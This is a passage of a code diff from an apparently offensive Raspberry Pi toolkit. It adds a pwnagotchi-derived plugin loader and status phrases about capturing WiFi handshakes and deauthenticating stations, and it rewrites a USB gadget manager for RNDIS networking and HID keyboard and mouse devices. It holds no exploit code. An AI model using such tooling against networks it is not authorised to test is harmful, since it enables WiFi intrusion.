        mood_key = face_name.lower()
        if mood_key in MOOD_FACES:
            MOOD_FACES[mood_key] = face_value

198
bifrost/plugins.py Normal file
View File

@@ -0,0 +1,198 @@
"""
Bifrost — Plugin system.
Ported from pwnagotchi/plugins/__init__.py with ThreadPoolExecutor.
Compatible with existing pwnagotchi plugin files.
"""
import os
import glob
import threading
import importlib
import importlib.util
import logging
import concurrent.futures
from logger import Logger
logger = Logger(name="bifrost.plugins", level=logging.DEBUG)
# Built-in plugins live next to this module.
default_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "plugins")
loaded = {}    # plugin name -> live Plugin instance
database = {}  # plugin name -> source file path (loaded or not)
locks = {}     # "plugin::on_callback" -> Lock serializing that callback
# Shared pool so slow plugin callbacks never block the engine thread.
_executor = concurrent.futures.ThreadPoolExecutor(
    max_workers=4, thread_name_prefix="BifrostPlugin"
)
class Plugin:
    """Base class for Bifrost/Pwnagotchi plugins.
    Subclasses are auto-registered via __init_subclass__.
    """
    __author__ = 'unknown'
    __version__ = '0.0.0'
    __license__ = 'GPL3'
    __description__ = ''
    __name__ = ''
    __help__ = ''
    __dependencies__ = []
    __defaults__ = {}
    def __init__(self):
        # Per-plugin option dict, populated by load() from the config.
        self.options = {}
    @classmethod
    def __init_subclass__(cls, **kwargs):
        """Eager registration: merely defining a subclass instantiates it
        and registers the instance under its module name."""
        super().__init_subclass__(**kwargs)
        global loaded, locks
        plugin_name = cls.__module__.split('.')[0]
        plugin_instance = cls()
        logger.debug("loaded plugin %s as %s", plugin_name, plugin_instance)
        loaded[plugin_name] = plugin_instance
        # One lock per on_* handler so concurrent events serialize
        # per-callback (see _locked_cb).
        for attr_name in dir(plugin_instance):
            if attr_name.startswith('on_'):
                cb = getattr(plugin_instance, attr_name, None)
                if cb is not None and callable(cb):
                    locks["%s::%s" % (plugin_name, attr_name)] = threading.Lock()
def toggle_plugin(name, enable=True):
    """Enable or disable a plugin at runtime. Returns True if state changed."""
    global loaded, database
    # Disable path: unload hook is best-effort, removal always happens.
    if not enable and name in loaded:
        plugin = loaded[name]
        try:
            if hasattr(plugin, 'on_unload'):
                plugin.on_unload()
        except Exception as e:
            logger.warning("Error unloading plugin %s: %s", name, e)
        del loaded[name]
        return True
    # Enable path: only known-but-unloaded plugins can be enabled.
    if enable and name in database and name not in loaded:
        try:
            load_from_file(database[name])
            if name in loaded:
                one(name, 'loaded')
            return True
        except Exception as e:
            logger.warning("Error loading plugin %s: %s", name, e)
    return False
def on(event_name, *args, **kwargs):
    """Dispatch event to ALL loaded plugins."""
    # Snapshot the names first — plugins may load/unload while we iterate.
    for name in list(loaded):
        one(name, event_name, *args, **kwargs)
def _locked_cb(lock_name, cb, *args, **kwargs):
    """Execute callback under its per-plugin lock."""
    global locks
    # Lazily create locks for callbacks registered after startup.
    lock = locks.setdefault(lock_name, threading.Lock())
    with lock:
        cb(*args, **kwargs)
def one(plugin_name, event_name, *args, **kwargs):
    """Dispatch event to a single plugin (thread-safe)."""
    global loaded
    plugin = loaded.get(plugin_name)
    if plugin is None:
        return
    cb_name = 'on_%s' % event_name
    callback = getattr(plugin, cb_name, None)
    if not callable(callback):
        return
    try:
        # The callback runs on the shared pool, serialized by its lock.
        lock_name = "%s::%s" % (plugin_name, cb_name)
        _executor.submit(_locked_cb, lock_name, callback, *args, **kwargs)
    except Exception as e:
        logger.error("error running %s.%s: %s", plugin_name, cb_name, e)
def load_from_file(filename):
    """Load a single plugin file.

    Returns:
        (plugin_name, module) tuple. Registration into ``loaded`` happens
        as a side effect of ``Plugin.__init_subclass__`` when the module
        defines a Plugin subclass.
    """
    logger.debug("loading %s", filename)
    # splitext strips only the final extension; the previous
    # ``filename.replace(".py", "")`` corrupted names for paths containing
    # ".py" elsewhere (e.g. "my.pyplug.py" -> "myplug").
    plugin_name = os.path.splitext(os.path.basename(filename))[0]
    spec = importlib.util.spec_from_file_location(plugin_name, filename)
    instance = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(instance)
    return plugin_name, instance
def load_from_path(path, enabled=()):
    """Scan a directory for plugins, load enabled ones.

    Every discovered file is recorded in ``database`` (name -> path) so it
    can be enabled later via toggle_plugin(); only names listed in
    *enabled* are actually imported now.
    """
    global loaded, database
    if not path or not os.path.isdir(path):
        return loaded
    logger.debug("loading plugins from %s — enabled: %s", path, enabled)
    for filename in glob.glob(os.path.join(path, "*.py")):
        # splitext, not str.replace: ".py" appearing mid-path must not be
        # stripped from the plugin name.
        plugin_name = os.path.splitext(os.path.basename(filename))[0]
        database[plugin_name] = filename
        if plugin_name in enabled:
            try:
                load_from_file(filename)
            except Exception as e:
                logger.warning("error loading %s: %s", filename, e)
    return loaded
def load(config):
    """Load plugins from default + custom paths based on config."""
    plugins_cfg = config.get('bifrost_plugins', {})
    enabled = [name for name, opts in plugins_cfg.items()
               if isinstance(opts, dict) and opts.get('enabled', False)]
    # Built-in plugins ship next to this module (bifrost/plugins/).
    if os.path.isdir(default_path):
        load_from_path(default_path, enabled=enabled)
    # User-supplied plugins may live anywhere on disk.
    custom_path = config.get('bifrost_plugins_path', '')
    if custom_path and os.path.isdir(custom_path):
        load_from_path(custom_path, enabled=enabled)
    # Hand each loaded plugin its own option block from the config.
    for name, plugin in loaded.items():
        if name in plugins_cfg:
            plugin.options = plugins_cfg[name]
    on('loaded')
    on('config_changed', config)
def get_loaded_info():
    """Return list of loaded plugin info dicts for web API."""
    infos = [{
        'name': name,
        'enabled': True,
        'author': getattr(plugin, '__author__', 'unknown'),
        'version': getattr(plugin, '__version__', '0.0.0'),
        'description': getattr(plugin, '__description__', ''),
    } for name, plugin in loaded.items()]
    # Known-but-disabled plugins are listed too, so the UI can offer them.
    infos.extend({
        'name': name,
        'enabled': False,
        'author': '',
        'version': '',
        'description': '',
    } for name in database if name not in loaded)
    return infos
def shutdown():
    """Clean shutdown of plugin system.

    Does not wait for in-flight plugin callbacks; they are best-effort
    workers and may be abandoned at process exit.
    """
    _executor.shutdown(wait=False)

155
bifrost/voice.py Normal file
View File

@@ -0,0 +1,155 @@
"""
Bifrost — Voice / status messages.
Ported from pwnagotchi/voice.py, uses random choice for personality.
"""
import random
class BifrostVoice:
    """Supplies randomized, context-aware status phrases for the Bifrost UI.

    Each ``on_*`` hook maps a UI event to a short message. Pools with
    several candidates are sampled with ``random.choice``; pool order is
    preserved so seeded RNG traces remain identical to the original port.
    """

    # Phrase pools. Entries containing {placeholders} are filled via
    # str.format by the corresponding hook.
    _STARTING = (
        "Hi, I'm Bifrost! Starting ...",
        "New day, new hunt, new pwns!",
        "Hack the Planet!",
        "Initializing WiFi recon ...",
    )
    _READY = (
        "Ready to roll!",
        "Let's find some handshakes!",
        "WiFi recon active.",
    )
    _AI_READY = (
        "AI ready.",
        "The neural network is ready.",
    )
    _NORMAL = ('', '...')
    _BORED = (
        "I'm bored ...",
        "Let's go for a walk!",
        "Nothing interesting around here ...",
    )
    _SAD = (
        "I'm extremely bored ...",
        "I'm very sad ...",
        "I'm sad",
        "...",
    )
    _ANGRY = (
        "...",
        "Leave me alone ...",
        "I'm mad at you!",
    )
    _EXCITED = (
        "I'm living the life!",
        "I pwn therefore I am.",
        "So many networks!!!",
        "I'm having so much fun!",
        "My crime is that of curiosity ...",
    )
    _NEW_PEER = (
        "Yo {peer}! Sup?",
        "Hey {peer} how are you doing?",
        "Unit {peer} is nearby!",
    )
    _LOST_PEER = (
        "Uhm ... goodbye {peer}",
        "{peer} is gone ...",
    )
    _MISS = (
        "Whoops ... {who} is gone.",
        "{who} missed!",
        "Missed!",
    )
    _GRATEFUL = (
        "Good friends are a blessing!",
        "I love my friends!",
    )
    _LONELY = (
        "Nobody wants to play with me ...",
        "I feel so alone ...",
        "Where's everybody?!",
    )
    _NAPPING = (
        "Napping for {secs}s ...",
        "Zzzzz",
        "ZzzZzzz ({secs}s)",
    )
    _SHUTDOWN = ("Good night.", "Zzz")
    _AWAKENING = ("...", "!")
    _WAITING = (
        "Waiting for {secs}s ...",
        "...",
        "Looking around ({secs}s)",
    )
    _ASSOC = (
        "Hey {ap} let's be friends!",
        "Associating to {ap}",
        "Yo {ap}!",
    )
    _DEAUTH = (
        "Just decided that {sta} needs no WiFi!",
        "Deauthenticating {sta}",
        "Kickbanning {sta}!",
    )
    _EPOCH = (
        "Epoch {num} complete.",
        "Finished epoch {num}.",
    )

    def on_starting(self):
        """Phrase shown while Bifrost is booting up."""
        return random.choice(self._STARTING)

    def on_ready(self):
        """Phrase shown once WiFi recon is active."""
        return random.choice(self._READY)

    def on_ai_ready(self):
        """Phrase shown once the AI component is ready."""
        return random.choice(self._AI_READY)

    def on_normal(self):
        """Neutral idle phrase (may be empty)."""
        return random.choice(self._NORMAL)

    def on_free_channel(self, channel):
        """Announce that *channel* is currently unoccupied."""
        return f"Hey, channel {channel} is free!"

    def on_bored(self):
        """Phrase for the bored mood."""
        return random.choice(self._BORED)

    def on_motivated(self, reward):
        """Phrase for a positive reward; *reward* value is not used in the text."""
        return "This is the best day of my life!"

    def on_demotivated(self, reward):
        """Phrase for a negative reward; *reward* value is not used in the text."""
        return "Shitty day :/"

    def on_sad(self):
        """Phrase for the sad mood."""
        return random.choice(self._SAD)

    def on_angry(self):
        """Phrase for the angry mood."""
        return random.choice(self._ANGRY)

    def on_excited(self):
        """Phrase for the excited mood."""
        return random.choice(self._EXCITED)

    def on_new_peer(self, peer_name, first_encounter=False):
        """Greet a nearby peer unit; special greeting on first encounter."""
        if first_encounter:
            return f"Hello {peer_name}! Nice to meet you."
        return random.choice(self._NEW_PEER).format(peer=peer_name)

    def on_lost_peer(self, peer_name):
        """Phrase when a previously seen peer disappears."""
        return random.choice(self._LOST_PEER).format(peer=peer_name)

    def on_miss(self, who):
        """Phrase when an attack target *who* got away."""
        return random.choice(self._MISS).format(who=who)

    def on_grateful(self):
        """Phrase for the grateful mood (has peers)."""
        return random.choice(self._GRATEFUL)

    def on_lonely(self):
        """Phrase for the lonely mood (no peers around)."""
        return random.choice(self._LONELY)

    def on_napping(self, secs):
        """Phrase while sleeping for *secs* seconds."""
        return random.choice(self._NAPPING).format(secs=secs)

    def on_shutdown(self):
        """Phrase on shutdown."""
        return random.choice(self._SHUTDOWN)

    def on_awakening(self):
        """Phrase when waking from a nap."""
        return random.choice(self._AWAKENING)

    def on_waiting(self, secs):
        """Phrase while idling for *secs* seconds."""
        return random.choice(self._WAITING).format(secs=secs)

    def on_assoc(self, ap_name):
        """Phrase when associating to access point *ap_name*."""
        return random.choice(self._ASSOC).format(ap=ap_name)

    def on_deauth(self, sta_mac):
        """Phrase when deauthenticating station *sta_mac*."""
        return random.choice(self._DEAUTH).format(sta=sta_mac)

    def on_handshakes(self, new_shakes):
        """Announce *new_shakes* freshly captured handshakes (pluralized)."""
        plural = 's' if new_shakes > 1 else ''
        return f"Cool, we got {new_shakes} new handshake{plural}!"

    def on_rebooting(self):
        """Phrase shown right before an error-triggered reboot."""
        return "Oops, something went wrong ... Rebooting ..."

    def on_epoch(self, epoch_num):
        """Phrase when training epoch *epoch_num* finishes."""
        return random.choice(self._EPOCH).format(num=epoch_num)

File diff suppressed because it is too large Load Diff

View File

@@ -1,567 +1,430 @@
#!/bin/bash
# bjorn_usb_gadget.sh
# Script to configure USB Gadget for BJORN
# Usage: ./bjorn_usb_gadget.sh -f
# ./bjorn_usb_gadget.sh -u
# ./bjorn_usb_gadget.sh -l
# ./bjorn_usb_gadget.sh -h
# Author: Infinition
# Version: 1.4
# Description: This script configures and manages USB Gadget for BJORN with duplicate prevention
# Runtime manager for the BJORN USB composite gadget
# Usage:
# ./bjorn_usb_gadget.sh -u Bring the gadget up
# ./bjorn_usb_gadget.sh -d Bring the gadget down
# ./bjorn_usb_gadget.sh -r Reset the gadget (down + up)
# ./bjorn_usb_gadget.sh -l Show detailed status
# ./bjorn_usb_gadget.sh -h Show help
#
# Notes:
# This script no longer installs or removes the USB gadget stack.
# Installation is handled by the BJORN installer.
# This tool is for runtime diagnostics and recovery only.
set -u
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color
CYAN='\033[0;36m'
NC='\033[0m'
# ============================================================
# Logging Configuration
# ============================================================
SCRIPT_VERSION="2.0"
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_usb_gadget_$(date +%Y%m%d_%H%M%S).log"
# Ensure log directory exists
mkdir -p "$LOG_DIR"
USB_GADGET_SERVICE="usb-gadget.service"
USB_GADGET_SCRIPT="/usr/local/bin/usb-gadget.sh"
DNSMASQ_SERVICE="dnsmasq.service"
DNSMASQ_CONFIG="/etc/dnsmasq.d/usb0"
MODULES_LOAD_FILE="/etc/modules-load.d/usb-gadget.conf"
MODULES_FILE="/etc/modules"
INTERFACES_FILE="/etc/network/interfaces"
mkdir -p "$LOG_DIR" 2>/dev/null || true
touch "$LOG_FILE" 2>/dev/null || true
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
local level="$1"
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
echo -e "$message" | tee -a "$LOG_FILE"
case $level in
"ERROR") echo -e "${RED}$message${NC}" ;;
"SUCCESS") echo -e "${GREEN}$message${NC}" ;;
"WARNING") echo -e "${YELLOW}$message${NC}" ;;
"INFO") echo -e "${BLUE}$message${NC}" ;;
*) echo -e "$message" ;;
local color="$NC"
case "$level" in
ERROR) color="$RED" ;;
SUCCESS) color="$GREEN" ;;
WARNING) color="$YELLOW" ;;
INFO) color="$BLUE" ;;
SECTION) color="$CYAN" ;;
esac
printf '%s\n' "$message" >> "$LOG_FILE" 2>/dev/null || true
printf '%b%s%b\n' "$color" "$message" "$NC"
}
# ============================================================
# Error Handling
# ============================================================
handle_error() {
local error_message=$1
log "ERROR" "$error_message"
exit 1
}
# ============================================================
# Function to Check Command Success
# ============================================================
check_success() {
if [ $? -eq 0 ]; then
log "SUCCESS" "$1"
return 0
else
handle_error "$1"
return $?
# Best-effort diagnostics: dump the last 20 journal lines for the gadget
# service, but only when both journalctl and the unit actually exist.
show_recent_logs() {
    if command -v journalctl >/dev/null 2>&1 && systemctl list-unit-files --type=service | grep -q "^${USB_GADGET_SERVICE}"; then
        log "INFO" "Recent ${USB_GADGET_SERVICE} logs:"
        # Never let a journalctl failure abort the caller.
        journalctl -u "$USB_GADGET_SERVICE" -n 20 --no-pager 2>/dev/null || true
    fi
}
# ============================================================
# Function to Show Usage
# ============================================================
# Abort (exit 1) unless running as root; systemctl/ip/configfs work below
# requires it.
ensure_root() {
    [ "$(id -u)" -eq 0 ] && return 0
    log "ERROR" "This command must be run as root. Please use sudo."
    exit 1
}
# True if a systemd unit file named "$1" is installed on this system.
service_exists() {
    systemctl list-unit-files --type=service 2>/dev/null | grep -q "^$1"
}
# True if service "$1" is currently active (running).
service_active() {
    systemctl is-active --quiet "$1"
}
# True if service "$1" is enabled to start at boot.
service_enabled() {
    systemctl is-enabled --quiet "$1"
}
# True if the usb0 gadget network interface currently exists.
usb0_exists() {
    ip link show usb0 >/dev/null 2>&1
}
# Print a cyan horizontal rule used to separate report sections.
print_divider() {
    printf '%b%s%b\n' "$CYAN" "============================================================" "$NC"
}
# Locate the Raspberry Pi boot config files, preferring the newer
# /boot/firmware layout over the legacy /boot one. Prints
# "<cmdline>|<config>" on stdout; a missing file yields an empty field.
detect_boot_paths() {
    local cmdline=""
    local config=""
    local base
    for base in /boot/firmware /boot; do
        [ -z "$cmdline" ] && [ -f "$base/cmdline.txt" ] && cmdline="$base/cmdline.txt"
        [ -z "$config" ] && [ -f "$base/config.txt" ] && config="$base/config.txt"
    done
    printf '%s|%s\n' "$cmdline" "$config"
}
# Poll a command until it succeeds or the attempt budget runs out.
#   $1 = human-readable description (used in log messages)
#   $2 = max attempts (one per second)
#   $@ = command (plus args) to test
# Returns 0 on success, 1 if the condition was never met.
wait_for_condition() {
    local description="$1"
    local attempts="$2"
    shift 2
    local attempt
    for (( attempt = 1; attempt <= attempts; attempt++ )); do
        if "$@"; then
            log "SUCCESS" "$description"
            return 0
        fi
        log "INFO" "Waiting for $description ($attempt/$attempts)..."
        sleep 1
    done
    log "WARNING" "$description not reached after ${attempts}s"
    return 1
}
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-f${NC} Install USB Gadget"
echo -e " ${BLUE}-u${NC} Uninstall USB Gadget"
echo -e " ${BLUE}-l${NC} List USB Gadget Information"
echo -e " ${BLUE}-u${NC} Bring USB Gadget up"
echo -e " ${BLUE}-d${NC} Bring USB Gadget down"
echo -e " ${BLUE}-r${NC} Reset USB Gadget (down + up)"
echo -e " ${BLUE}-l${NC} List detailed USB Gadget status"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Example:"
echo -e " $0 -f Install USB Gadget"
echo -e " $0 -u Uninstall USB Gadget"
echo -e " $0 -l List USB Gadget Information"
echo -e " $0 -h Show help"
echo -e "Examples:"
echo -e " $0 -u Start the BJORN composite gadget"
echo -e " $0 -d Stop the BJORN composite gadget cleanly"
echo -e " $0 -r Reinitialize the gadget if RNDIS/HID is stuck"
echo -e " $0 -l Show services, usb0, /dev/hidg*, and boot config"
echo -e ""
echo -e "${YELLOW}===== RNDIS Configuration Procedure =====${NC}"
echo -e "To configure the RNDIS driver and set the IP address, subnet mask, and gateway for the RNDIS network interface card, follow the steps below:"
echo -e ""
echo -e "1. **Configure IP Address on the Server (Pi):**"
echo -e " - The default IP address is set in the script as follows:"
echo -e " - IP: 172.20.2.1"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e ""
echo -e "2. **Configure IP Address on the Host Computer:**"
echo -e " - On your host computer (Windows, Linux, etc.), configure the RNDIS network interface to use an IP address in the same subnet. For example:"
echo -e " - IP: 172.20.2.2"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e ""
echo -e "3. **Restart the Service:**"
echo -e " - After installing the USB gadget, restart the service to apply the changes:"
echo -e " ```bash"
echo -e " sudo systemctl restart usb-gadget.service"
echo -e " ```"
echo -e ""
echo -e "4. **Verify the Connection:**"
echo -e " - Ensure that the RNDIS network interface is active on both devices."
echo -e " - Test connectivity by pinging the IP address of the other device."
echo -e " - From the Pi: \`ping 172.20.2.2\`"
echo -e " - From the host computer: \`ping 172.20.2.1\`"
echo -e ""
echo -e "===== End of Procedure =====${NC}"
exit 1
echo -e "${YELLOW}This script no longer installs or removes USB Gadget.${NC}"
echo -e "${YELLOW}That part is handled by the BJORN installer.${NC}"
if [ "${1:-exit}" = "return" ]; then
return 0
fi
exit 0
}
# ============================================================
# Function to Install USB Gadget with RNDIS
# ============================================================
install_usb_gadget() {
log "INFO" "Starting USB Gadget installation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Backup cmdline.txt and config.txt if not already backed up
if [ ! -f /boot/firmware/cmdline.txt.bak ]; then
cp /boot/firmware/cmdline.txt /boot/firmware/cmdline.txt.bak
check_success "Backed up /boot/firmware/cmdline.txt to /boot/firmware/cmdline.txt.bak"
else
log "INFO" "/boot/firmware/cmdline.txt.bak already exists. Skipping backup."
fi
if [ ! -f /boot/firmware/config.txt.bak ]; then
cp /boot/firmware/config.txt /boot/firmware/config.txt.bak
check_success "Backed up /boot/firmware/config.txt to /boot/firmware/config.txt.bak"
else
log "INFO" "/boot/firmware/config.txt.bak already exists. Skipping backup."
fi
# Modify cmdline.txt: Remove existing modules-load entries related to dwc2
log "INFO" "Cleaning up existing modules-load entries in /boot/firmware/cmdline.txt"
sudo sed -i '/modules-load=dwc2,g_rndis/d' /boot/firmware/cmdline.txt
sudo sed -i '/modules-load=dwc2,g_ether/d' /boot/firmware/cmdline.txt
check_success "Removed duplicate modules-load entries from /boot/firmware/cmdline.txt"
# Add a single modules-load=dwc2,g_rndis if not present
if ! grep -q "modules-load=dwc2,g_rndis" /boot/firmware/cmdline.txt; then
sudo sed -i 's/rootwait/rootwait modules-load=dwc2,g_rndis/' /boot/firmware/cmdline.txt
check_success "Added modules-load=dwc2,g_rndis to /boot/firmware/cmdline.txt"
else
log "INFO" "modules-load=dwc2,g_rndis already present in /boot/firmware/cmdline.txt"
fi
# Add a single modules-load=dwc2,g_ether if not present
if ! grep -q "modules-load=dwc2,g_ether" /boot/firmware/cmdline.txt; then
sudo sed -i 's/rootwait/rootwait modules-load=dwc2,g_ether/' /boot/firmware/cmdline.txt
check_success "Added modules-load=dwc2,g_ether to /boot/firmware/cmdline.txt"
else
log "INFO" "modules-load=dwc2,g_ether already present in /boot/firmware/cmdline.txt"
fi
# Modify config.txt: Remove duplicate dtoverlay=dwc2 entries
log "INFO" "Cleaning up existing dtoverlay=dwc2 entries in /boot/firmware/config.txt"
sudo sed -i '/^dtoverlay=dwc2$/d' /boot/firmware/config.txt
check_success "Removed duplicate dtoverlay=dwc2 entries from /boot/firmware/config.txt"
# Append a single dtoverlay=dwc2 if not present
if ! grep -q "^dtoverlay=dwc2$" /boot/firmware/config.txt; then
echo "dtoverlay=dwc2" | sudo tee -a /boot/firmware/config.txt
check_success "Appended dtoverlay=dwc2 to /boot/firmware/config.txt"
else
log "INFO" "dtoverlay=dwc2 already present in /boot/firmware/config.txt"
fi
# Create USB gadget script
if [ ! -f /usr/local/bin/usb-gadget.sh ]; then
log "INFO" "Creating USB gadget script at /usr/local/bin/usb-gadget.sh"
cat > /usr/local/bin/usb-gadget.sh << 'EOF'
#!/bin/bash
set -e
# Enable debug mode for detailed logging
set -x
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: RNDIS Network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/rndis.usb0
# Remove existing symlink if it exists to prevent duplicates
if [ -L configs/c.1/rndis.usb0 ]; then
rm configs/c.1/rndis.usb0
fi
ln -s functions/rndis.usb0 configs/c.1/
# Ensure the device is not busy before listing available USB device controllers
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
# Assign the USB Device Controller (UDC)
UDC_NAME=$(ls /sys/class/udc)
echo "$UDC_NAME" > UDC
echo "Assigned UDC: $UDC_NAME"
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
echo "Configured usb0 with IP 172.20.2.1"
else
echo "Interface usb0 already configured."
fi
EOF
chmod +x /usr/local/bin/usb-gadget.sh
check_success "Created and made USB gadget script executable at /usr/local/bin/usb-gadget.sh"
else
log "INFO" "USB gadget script /usr/local/bin/usb-gadget.sh already exists. Skipping creation."
fi
# Create USB gadget service
if [ ! -f /etc/systemd/system/usb-gadget.service ]; then
log "INFO" "Creating USB gadget systemd service at /etc/systemd/system/usb-gadget.service"
cat > /etc/systemd/system/usb-gadget.service << EOF
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
EOF
check_success "Created USB gadget systemd service at /etc/systemd/system/usb-gadget.service"
else
log "INFO" "USB gadget systemd service /etc/systemd/system/usb-gadget.service already exists. Skipping creation."
fi
# Configure network interface: Remove duplicate entries first
log "INFO" "Cleaning up existing network interface configurations for usb0 in /etc/network/interfaces"
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
# Remove all lines starting with allow-hotplug usb0 and the following lines (iface and settings)
sudo sed -i '/^allow-hotplug usb0$/,/^$/d' /etc/network/interfaces
check_success "Removed existing network interface configurations for usb0 from /etc/network/interfaces"
else
log "INFO" "No existing network interface configuration for usb0 found in /etc/network/interfaces."
fi
# Append network interface configuration for usb0 if not already present
if ! grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
log "INFO" "Appending network interface configuration for usb0 to /etc/network/interfaces"
cat >> /etc/network/interfaces << EOF
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
gateway 172.20.2.1
EOF
check_success "Appended network interface configuration for usb0 to /etc/network/interfaces"
else
log "INFO" "Network interface usb0 already configured in /etc/network/interfaces"
fi
# Reload systemd daemon and enable/start services
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload
check_success "Reloaded systemd daemon"
log "INFO" "Enabling systemd-networkd service"
systemctl enable systemd-networkd
check_success "Enabled systemd-networkd service"
log "INFO" "Enabling usb-gadget service"
systemctl enable usb-gadget.service
check_success "Enabled usb-gadget service"
log "INFO" "Starting systemd-networkd service"
systemctl start systemd-networkd
check_success "Started systemd-networkd service"
log "INFO" "Starting usb-gadget service"
systemctl start usb-gadget.service
check_success "Started usb-gadget service"
log "SUCCESS" "USB Gadget installation completed successfully."
}
# ============================================================
# Function to Uninstall USB Gadget
# ============================================================
uninstall_usb_gadget() {
log "INFO" "Starting USB Gadget uninstallation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Stop and disable USB gadget service
if systemctl is-active --quiet usb-gadget.service; then
systemctl stop usb-gadget.service
check_success "Stopped usb-gadget.service"
else
log "INFO" "usb-gadget.service is not running."
fi
if systemctl is-enabled --quiet usb-gadget.service; then
systemctl disable usb-gadget.service
check_success "Disabled usb-gadget.service"
else
log "INFO" "usb-gadget.service is not enabled."
fi
# Remove USB gadget service file
if [ -f /etc/systemd/system/usb-gadget.service ]; then
rm /etc/systemd/system/usb-gadget.service
check_success "Removed /etc/systemd/system/usb-gadget.service"
else
log "INFO" "/etc/systemd/system/usb-gadget.service does not exist. Skipping removal."
fi
# Remove USB gadget script
if [ -f /usr/local/bin/usb-gadget.sh ]; then
rm /usr/local/bin/usb-gadget.sh
check_success "Removed /usr/local/bin/usb-gadget.sh"
else
log "INFO" "/usr/local/bin/usb-gadget.sh does not exist. Skipping removal."
fi
# Restore cmdline.txt and config.txt from backups
if [ -f /boot/firmware/cmdline.txt.bak ]; then
cp /boot/firmware/cmdline.txt.bak /boot/firmware/cmdline.txt
chmod 644 /boot/firmware/cmdline.txt
check_success "Restored /boot/firmware/cmdline.txt from backup"
else
log "WARNING" "Backup /boot/firmware/cmdline.txt.bak not found. Skipping restoration."
fi
if [ -f /boot/firmware/config.txt.bak ]; then
cp /boot/firmware/config.txt.bak /boot/firmware/config.txt
check_success "Restored /boot/firmware/config.txt from backup"
else
log "WARNING" "Backup /boot/firmware/config.txt.bak not found. Skipping restoration."
fi
# Remove network interface configuration for usb0: Remove all related lines
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
log "INFO" "Removing network interface configuration for usb0 from /etc/network/interfaces"
# Remove lines from allow-hotplug usb0 up to the next empty line
sudo sed -i '/^allow-hotplug usb0$/,/^$/d' /etc/network/interfaces
check_success "Removed network interface configuration for usb0 from /etc/network/interfaces"
else
log "INFO" "Network interface usb0 not found in /etc/network/interfaces. Skipping removal."
fi
# Reload systemd daemon
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload
check_success "Reloaded systemd daemon"
# Disable and stop systemd-networkd service
if systemctl is-active --quiet systemd-networkd; then
systemctl stop systemd-networkd
check_success "Stopped systemd-networkd service"
else
log "INFO" "systemd-networkd service is not running."
fi
if systemctl is-enabled --quiet systemd-networkd; then
systemctl disable systemd-networkd
check_success "Disabled systemd-networkd service"
else
log "INFO" "systemd-networkd service is not enabled."
fi
# Clean up any remaining duplicate entries in cmdline.txt and config.txt
log "INFO" "Ensuring no duplicate entries remain in configuration files."
# Remove any remaining modules-load=dwc2,g_rndis and modules-load=dwc2,g_ether
sudo sed -i '/modules-load=dwc2,g_rndis/d' /boot/firmware/cmdline.txt
sudo sed -i '/modules-load=dwc2,g_ether/d' /boot/firmware/cmdline.txt
# Remove any remaining dtoverlay=dwc2
sudo sed -i '/^dtoverlay=dwc2$/d' /boot/firmware/config.txt
log "INFO" "Cleaned up duplicate entries in /boot/firmware/cmdline.txt and /boot/firmware/config.txt"
log "SUCCESS" "USB Gadget uninstallation completed successfully."
}
# ============================================================
# Function to List USB Gadget Information
# ============================================================
list_usb_gadget_info() {
echo -e "${CYAN}===== USB Gadget Information =====${NC}"
local boot_pair
local cmdline_file
local config_file
# Check status of usb-gadget service
echo -e "\n${YELLOW}Service Status:${NC}"
if systemctl list-units --type=service | grep -q usb-gadget.service; then
systemctl status usb-gadget.service --no-pager
boot_pair="$(detect_boot_paths)"
cmdline_file="${boot_pair%%|*}"
config_file="${boot_pair##*|}"
print_divider
log "SECTION" "BJORN USB Gadget Status"
print_divider
log "INFO" "Expected layout: RNDIS usb0 + HID keyboard /dev/hidg0 + HID mouse /dev/hidg1"
log "INFO" "Script version: ${SCRIPT_VERSION}"
log "INFO" "Log file: ${LOG_FILE}"
print_divider
log "SECTION" "Service Status"
if service_exists "$USB_GADGET_SERVICE"; then
service_active "$USB_GADGET_SERVICE" && log "SUCCESS" "${USB_GADGET_SERVICE} is active" || log "WARNING" "${USB_GADGET_SERVICE} is not active"
